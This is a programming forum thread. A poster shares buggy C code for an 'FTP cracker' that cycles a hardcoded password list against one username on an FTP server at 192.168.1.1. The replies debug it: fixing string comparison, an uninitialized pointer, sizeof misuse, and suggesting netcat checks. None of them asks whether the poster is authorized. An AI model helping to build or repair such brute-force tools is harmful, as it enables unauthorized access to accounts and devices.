-
FTP error?
I am making FTP cracker and FTP dont recognize my inputs, and I dont know what am I doing it wrong. :)
Code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
struct sockaddr_in serv_addr;
char sendBuffer[128];
char recvBuffer[1024];
char* attempt;
char* user = "telekom";
char* passwords[10] = {"admin", "administrator", "password123", "telekom", "sifra123"};
int sock = 0;
int recived = 0;
char* connectToFTP(char* _user, char* _password){
char userBuffer[128];
strcpy(userBuffer, "");
strcat(userBuffer, "\r\n");
strcat(userBuffer, "USER ");
strcat(userBuffer, _user);
char passBuffer[128];
strcpy(passBuffer, "");
strcat(passBuffer, "\r\n");
strcat(passBuffer, "PASS ");
strcat(passBuffer, _password);
char endBuffer[32] = "QUIT\r\n";
sock = socket(AF_INET, SOCK_STREAM, 0);
printf("\nTrying: ");
printf("%s", userBuffer);
printf("%s", passBuffer);
printf("\n >>> %s", attempt);
printf("\n-----------------------\n");
connect(sock, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
recived = recv(sock, recvBuffer, sizeof(recvBuffer), 0);
recvBuffer[recived] = 0; // flush
// USER
sendto(sock, userBuffer, sizeof(userBuffer), 0, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
recived = recv(sock, recvBuffer, sizeof(recvBuffer), 0);
recvBuffer[recived] = 0; // flush
// PASS
sendto(sock, passBuffer, sizeof(passBuffer), 0, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
recived = recv(sock, recvBuffer, sizeof(recvBuffer), 0);
recvBuffer[recived] = 0; // flush
// END
sendto(sock, endBuffer, sizeof(endBuffer), 0, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
return recvBuffer;
}
int main(int argc, char** args){
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(21);
serv_addr.sin_addr.s_addr = inet_addr("192.168.1.1");
int i;
char* passLength;
memset(passLength, '1', sizeof(passwords));
for(i = 0; i <= sizeof(passLength); i++){
attempt = connectToFTP(user, passwords[i]);
//printf(", %s", attempt);
if(attempt == "230") {
printf("Password Found: %s", passwords[i]);
break;
}
} close(sock);
return 0 ;
}
-
How doesn't it recognize input? Do you intend to implement FTP, SFTP, or FTP over TLS (looking at the code FTP, but who knows what server you hosted on your local machine)? Is connection at least established? (I cannot see any error handling.) If not, first check if it is established. Then check if the data is correctly transmitted, e.g., with the "netcat" utility listening on a given port.
I am not an FTP expert, but I would also try with Unix line ends ("\n" instead of "\r\n").
-
This is wrong. passLength has no allocated space. It's not even inititalized to NULL so it's pointing at an arbitrary location.
Code:
char* passLength;
memset(passLength, '1', sizeof(passwords));
This is not how you compare strings:
Code:
if (attempt == "230")
That will never be true. You mean
Code:
if (strcmp(attempt, "230") == 0)
This part can be simplified quite a bit:
Code:
char userBuffer[128] = "\r\nUSER ";
strcat(userBuffer, _user);
And "recived" is not a word.
Also, sizeof(passLength) will always be just the size of the pointer itself, either 4 or 8 (depending on whether your system is 32 or 64 bits).
